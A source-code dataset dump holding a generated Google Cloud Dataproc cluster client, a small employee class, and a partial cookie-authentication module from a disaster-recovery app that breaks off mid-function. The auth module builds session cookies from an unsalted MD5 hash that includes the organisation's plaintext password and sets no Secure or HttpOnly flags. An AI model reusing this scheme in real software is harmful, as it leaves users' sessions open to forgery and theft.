timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster`:
>>> cluster = {}
>>>
>>> response = client.create_cluster(project_id, region, cluster)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster (Union[dict, ~google.cloud.dataproc_v1beta2.types.Cluster]): Required. The cluster to create.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Cluster`
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``CreateClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "create_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"create_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_cluster,
default_retry=self._method_configs["CreateCluster"].retry,
default_timeout=self._method_configs["CreateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.CreateClusterRequest(
project_id=project_id, region=region, cluster=cluster, request_id=request_id
)
operation = self._inner_api_calls["create_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def update_cluster(
self,
project_id,
region,
cluster_name,
cluster,
update_mask,
graceful_decommission_timeout=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Updates a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> # TODO: Initialize `cluster`:
>>> cluster = {}
>>>
>>> # TODO: Initialize `update_mask`:
>>> update_mask = {}
>>>
>>> response = client.update_cluster(project_id, region, cluster_name, cluster, update_mask)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project the
cluster belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
cluster (Union[dict, ~google.cloud.dataproc_v1beta2.types.Cluster]): Required. The changes to the cluster.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Cluster`
update_mask (Union[dict, ~google.cloud.dataproc_v1beta2.types.FieldMask]): Required. Specifies the path, relative to ``Cluster``, of the field to
update. For example, to change the number of workers in a cluster to 5,
the ``update_mask`` parameter would be specified as
``config.worker_config.num_instances``, and the ``PATCH`` request body
would specify the new value, as follows:
::
{
"config":{
"workerConfig":{
"numInstances":"5"
}
}
}
Similarly, to change the number of preemptible workers in a cluster to
5, the ``update_mask`` parameter would be
``config.secondary_worker_config.num_instances``, and the ``PATCH``
request body would be set as follows:
::
{
"config":{
"secondaryWorkerConfig":{
"numInstances":"5"
}
}
}
Note: currently only the following fields can be updated:
.. raw:: html
<table>
<tr>
<td><strong>Mask</strong></td><td><strong>Purpose</strong></td>
</tr>
<tr>
<td>labels</td><td>Updates labels</td>
</tr>
<tr>
<td>config.worker_config.num_instances</td><td>Resize primary worker
group</td>
</tr>
<tr>
<td>config.secondary_worker_config.num_instances</td><td>Resize secondary
worker group</td>
</tr>
<tr>
<td>config.lifecycle_config.auto_delete_ttl</td><td>Reset MAX TTL
duration</td>
</tr>
<tr>
<td>config.lifecycle_config.auto_delete_time</td><td>Update MAX TTL
deletion timestamp</td>
</tr>
<tr>
<td>config.lifecycle_config.idle_delete_ttl</td><td>Update Idle TTL
duration</td>
</tr>
<tr>
<td>config.autoscaling_config.policy_uri</td><td>Use, stop using, or change
autoscaling policies</td>
</tr>
</table>
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.FieldMask`
graceful_decommission_timeout (Union[dict, ~google.cloud.dataproc_v1beta2.types.Duration]): Optional. Timeout for graceful YARN decomissioning. Graceful
decommissioning allows removing nodes from the cluster without
interrupting jobs in progress. Timeout specifies how long to wait for jobs
in progress to finish before forcefully removing nodes (and potentially
interrupting jobs). Default timeout is 0 (for forceful decommission), and
the maximum allowed timeout is 1 day.
Only supported on Dataproc image versions 1.2 and higher.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.dataproc_v1beta2.types.Duration`
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``UpdateClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "update_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"update_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_cluster,
default_retry=self._method_configs["UpdateCluster"].retry,
default_timeout=self._method_configs["UpdateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.UpdateClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster=cluster,
update_mask=update_mask,
graceful_decommission_timeout=graceful_decommission_timeout,
request_id=request_id,
)
operation = self._inner_api_calls["update_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def delete_cluster(
self,
project_id,
region,
cluster_name,
cluster_uuid=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.delete_cluster(project_id, region, cluster_name)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
cluster_uuid (str): Optional. Specifying the ``cluster_uuid`` means the RPC should fail
(with error NOT\_FOUND) if cluster with specified UUID does not exist.
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``DeleteClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "delete_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"delete_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_cluster,
default_retry=self._method_configs["DeleteCluster"].retry,
default_timeout=self._method_configs["DeleteCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DeleteClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster_uuid=cluster_uuid,
request_id=request_id,
)
operation = self._inner_api_calls["delete_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def get_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets the resource representation for a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.get_cluster(project_id, region, cluster_name)
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types.Cluster` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"get_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_cluster,
default_retry=self._method_configs["GetCluster"].retry,
default_timeout=self._method_configs["GetCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.GetClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
return self._inner_api_calls["get_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_clusters(
self,
project_id,
region,
filter_=None,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists all regions/{region}/clusters in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # Iterate over all results
>>> for element in client.list_clusters(project_id, region):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_clusters(project_id, region).pages:
... for element in page:
... # process element
... pass
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
filter_ (str): Optional. A filter constraining the clusters to list. Filters are
case-sensitive and have the following syntax:
field = value [AND [field = value]] ...
where **field** is one of ``status.state``, ``clusterName``, or
``labels.[KEY]``, and ``[KEY]`` is a label key. **value** can be ``*``
to match all values. ``status.state`` can be one of the following:
``ACTIVE``, ``INACTIVE``, ``CREATING``, ``RUNNING``, ``ERROR``,
``DELETING``, or ``UPDATING``. ``ACTIVE`` contains the ``CREATING``,
``UPDATING``, and ``RUNNING`` states. ``INACTIVE`` contains the
``DELETING`` and ``ERROR`` states. ``clusterName`` is the name of the
cluster provided at creation time. Only the logical ``AND`` operator is
supported; space-separated items are treated as having an implicit
``AND`` operator.
Example filter:
status.state = ACTIVE AND clusterName = mycluster AND labels.env =
staging AND labels.starred = \*
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.dataproc_v1beta2.types.Cluster` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_clusters" not in self._inner_api_calls:
self._inner_api_calls[
"list_clusters"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_clusters,
default_retry=self._method_configs["ListClusters"].retry,
default_timeout=self._method_configs["ListClusters"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.ListClustersRequest(
project_id=project_id, region=region, filter=filter_, page_size=page_size
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_clusters"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="clusters",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def diagnose_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets cluster diagnostic information. After the operation completes, the
Operation.response field contains ``DiagnoseClusterOutputLocation``.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.diagnose_cluster(project_id, region, cluster_name)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "diagnose_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"diagnose_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.diagnose_cluster,
default_retry=self._method_configs["DiagnoseCluster"].retry,
default_timeout=self._method_configs["DiagnoseCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DiagnoseClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
operation = self._inner_api_calls["diagnose_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=clusters_pb2.DiagnoseClusterResults,
)
| 43.329897
| 164
| 0.588601
|
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.page_iterator
import grpc
from google.cloud.dataproc_v1beta2.gapic import cluster_controller_client_config
from google.cloud.dataproc_v1beta2.gapic import enums
from google.cloud.dataproc_v1beta2.gapic.transports import (
cluster_controller_grpc_transport,
)
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import clusters_pb2
from google.cloud.dataproc_v1beta2.proto import clusters_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import operations_pb2 as proto_operations_pb2
from google.longrunning import operations_pb2 as longrunning_operations_pb2
from google.protobuf import duration_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-dataproc").version
class ClusterControllerClient(object):
SERVICE_ADDRESS = "dataproc.googleapis.com:443"
_INTERFACE_NAME = "google.cloud.dataproc.v1beta2.ClusterController"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = cluster_controller_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=cluster_controller_grpc_transport.ClusterControllerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = cluster_controller_grpc_transport.ClusterControllerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
self._inner_api_calls = {}
def create_cluster(
self,
project_id,
region,
cluster,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "create_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"create_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_cluster,
default_retry=self._method_configs["CreateCluster"].retry,
default_timeout=self._method_configs["CreateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.CreateClusterRequest(
project_id=project_id, region=region, cluster=cluster, request_id=request_id
)
operation = self._inner_api_calls["create_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def update_cluster(
self,
project_id,
region,
cluster_name,
cluster,
update_mask,
graceful_decommission_timeout=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "update_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"update_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_cluster,
default_retry=self._method_configs["UpdateCluster"].retry,
default_timeout=self._method_configs["UpdateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.UpdateClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster=cluster,
update_mask=update_mask,
graceful_decommission_timeout=graceful_decommission_timeout,
request_id=request_id,
)
operation = self._inner_api_calls["update_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def delete_cluster(
self,
project_id,
region,
cluster_name,
cluster_uuid=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "delete_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"delete_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_cluster,
default_retry=self._method_configs["DeleteCluster"].retry,
default_timeout=self._method_configs["DeleteCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DeleteClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster_uuid=cluster_uuid,
request_id=request_id,
)
operation = self._inner_api_calls["delete_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def get_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "get_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"get_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_cluster,
default_retry=self._method_configs["GetCluster"].retry,
default_timeout=self._method_configs["GetCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.GetClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
return self._inner_api_calls["get_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_clusters(
self,
project_id,
region,
filter_=None,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "list_clusters" not in self._inner_api_calls:
self._inner_api_calls[
"list_clusters"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_clusters,
default_retry=self._method_configs["ListClusters"].retry,
default_timeout=self._method_configs["ListClusters"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.ListClustersRequest(
project_id=project_id, region=region, filter=filter_, page_size=page_size
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_clusters"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="clusters",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def diagnose_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "diagnose_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"diagnose_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.diagnose_cluster,
default_retry=self._method_configs["DiagnoseCluster"].retry,
default_timeout=self._method_configs["DiagnoseCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DiagnoseClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
operation = self._inner_api_calls["diagnose_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=clusters_pb2.DiagnoseClusterResults,
)
| true
| true
|
1c4229d82360abfecb0c9b9eeb6d19c89a7b1ea2
| 468
|
py
|
Python
|
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
# touchpoint/employee.py
class Employee():
def __init__(self, employee_id, first_name=None, last_name=None, emp_id=None):
self.employee_id = employee_id
self.first_name = first_name
self.last_name = last_name
self.emp_id = emp_id
def info(self):
return {'employee_id': self.employee_id,
'emp_id': self.emp_id,
'first_name': self.first_name,
'last_name': self.last_name}
| 31.2
| 82
| 0.617521
|
class Employee():
def __init__(self, employee_id, first_name=None, last_name=None, emp_id=None):
self.employee_id = employee_id
self.first_name = first_name
self.last_name = last_name
self.emp_id = emp_id
def info(self):
return {'employee_id': self.employee_id,
'emp_id': self.emp_id,
'first_name': self.first_name,
'last_name': self.last_name}
| true
| true
|
1c422bf19b2171922a496659c3a4345cf5fbb0b3
| 4,397
|
py
|
Python
|
sandy-disaster-recovery/key.py
|
toddjcrane/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2017-01-07T21:44:21.000Z
|
2017-01-07T21:44:21.000Z
|
sandy-disaster-recovery/key.py
|
aarontitus/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2021-03-26T00:25:19.000Z
|
2021-03-26T00:25:19.000Z
|
sandy-disaster-recovery/key.py
|
toddjcrane/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2017-09-07T09:52:15.000Z
|
2017-09-07T09:52:15.000Z
|
#!/usr/bin/env python
#
# Copyright 2012 Jeremy Pack
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import db
import Cookie
import datetime
import hashlib
import organization
from google.appengine.api import memcache
import cache
import event_db
class Key(db.Model):
secret_key = db.StringProperty(required = True)
date = db.DateTimeProperty(required = True, auto_now_add = True)
def hashOrganization(self, org):
h = hashlib.md5()
h.update(self.secret_key)
h.update(org.name)
h.update(org.password)
h.update(str(self.key().id()))
return h.hexdigest()
def getCookie(self, org, event):
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = (
":".join([self.hashOrganization(org),
str(self.key().id()),
str(org.key().id()),
str(event.key().id())]))
cookie["sandy-recovery-auth"]["domain"] = ""
if not org.only_session_authentication:
expires = datetime.datetime.now() + datetime.timedelta(days = 1)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
one_week_in_seconds = 604800
def GetCached(key_id):
return cache.GetCachedById(Key, one_week_in_seconds, key_id)
def GetAndCache(key_id):
return cache.GetAndCache(Key, one_week_in_seconds, key_id)
def GetDeleteCookie():
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = ""
cookie["sandy-recovery-auth"]["domain"] = ""
expires = datetime.datetime.now() - datetime.timedelta(days = 7)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
def getIntOrNone(s):
try:
return int(s)
except ValueError:
return None
def CheckAuthorization(request):
if "Cookie" in request.headers.keys():
cookie = Cookie.SimpleCookie(request.headers["Cookie"])
if "sandy-recovery-auth" in cookie.keys():
contents = cookie["sandy-recovery-auth"].value
if contents:
parts = contents.split(":")
if len(parts) == 4:
event_id = getIntOrNone(parts[3])
org_id = getIntOrNone(parts[2])
key_id = getIntOrNone(parts[1])
if org_id and key_id and event_id:
